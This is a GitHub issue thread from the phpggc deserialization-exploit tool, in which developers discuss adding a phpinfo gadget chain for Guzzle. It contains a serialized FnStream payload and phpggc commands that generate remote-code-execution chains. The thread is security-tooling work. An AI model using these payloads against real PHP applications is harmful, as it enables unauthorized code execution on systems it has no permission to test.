### ISSUE TITLE
PHPInfo Gadget Chain

### ISSUE THREAD

**Issue by erwanlr** [ambionics/phpggc#39]
Could it be possible to implement a PHPInfo GadgetChain type ? It doesn't seem possible to execute it via Guzzle/RCE1 (unless I missed something), but managed to get it working via old crafting methods with 

```O:24:"GuzzleHttp\Psr7\FnStream":1:{s:9:"_fn_close"%3Bs:7:"phpinfo"%3B}```

and would like to send a PR to have it there (affected versions of Guzzle are the same than for the RCE/FW).

Edit: Im trying against GuzzleHTTP v6.2.2 with PSR7 v1.3.1 to be exact.

**Comment by erwanlr** [comment]
Never mind, dropping the -f did the trick.

However, while ```./phpggc Guzzle/RCE1 phpinfo 32 -s``` works, ```./phpggc Guzzle/RCE1 phpinfo '-1' -s``` does not generate the payload (```ERROR: Unknown parameter: -1```)

**Comment by erwanlr** [comment]
Reopening as it could be interesting to have such type, allowing to pop a phpinfo() when we can call an arbitrary function, but not pass attributes (such as with ```call_user_func($this->attribute)```)

**Comment by cfreal** [comment]
### To call phpinfo()
At the moment, just use `./phpggc guzzle/rce1 call_user_func phpinfo`. This converts a 1-parameter function call into a 0-parameter function call.

### -1 problem
Also, when you send `-1`, PHPGGC thinks this is an option (such as `-f`, `--soft`, etc.). Use `./phpggc guzzle/rce1 -s -- phpinfo -1`. In most bash programs, `--` means "stop parsing parameters starting with a `-` as an option".

### Implementation of function calls with several arguments

#### Overview

So this is actually a thing I'd like to implement. Sometimes the gadget chain allows you to send several parameters to a function, sometimes only one (or zero, but zero-argument functions are pretty useless for exploitation). As long as you can send 2 arguments, you can call `call_user_func_array($funcname, $args)`, and therefore you can call any function with any number of arguments.

#### Problems

1. We need a way to indicate the min/max number of arguments for a gadget chain. This can be done using `min_args` and `max_args`, for instance:

```php
<?php

class RCE1 extends \PHPGGC\GadgetChain\RCE
{
    public $version = '7.0.8 < ?';
    public $vector = '__destruct';
    public $author = 'bla';
    public $informations = 'bla';
    public $min_args = 1;
    public $max_args = 3;
```

This does not feel adequate because generally you'll have a function call with a specific number of parameters, or as many parameters as you want. So I'll probably go with:

```php
<?php

class RCE1 extends \PHPGGC\GadgetChain\RCE
{
    public $version = '7.0.8 < ?';
    public $vector = '__destruct';
    public $author = 'bla';
    public $informations = 'bla';
    public $nb_args = 2; // -1 for as many as you want
```

2. Representing arguments

We're sending PHP arguments through the command line, so we can only send strings. What if I want to call a function that takes an array as second parameter ? I'll probably allow a way to send params as JSON or something, but this seems a bit complicated. I'm planning on making PHPGGC more usable as a PHP lib, not only from the command line. But this will take some time.

**Comment by erwanlr** [comment]
Thx :)

```./phpggc guzzle/rce1 -s -- phpinfo -1``` doesn't work though, but the call_user_func trick is nice.

It's nice that you are thinking about multiple argument support. The tool is already well done, and custom implementation can be done with just creating two files, so no worries about the time it would take.

I ended up creating a Guzzle/RCE2 for my case (and the payload is quite short, cf my first post). I will see to submit a PR to have a TYPE_INFO implementation as sometimes it could be useful.

**Comment by cfreal** [comment]
FYI: I just fixed the bug involving `--`. `./phpggc guzzle/rce1 -s -- phpinfo -1` works now.

**Comment by erwanlr** [comment]
Oh great, thank you!

I've implemented the PHPInfo GadgetChain, will submit a PR this week end
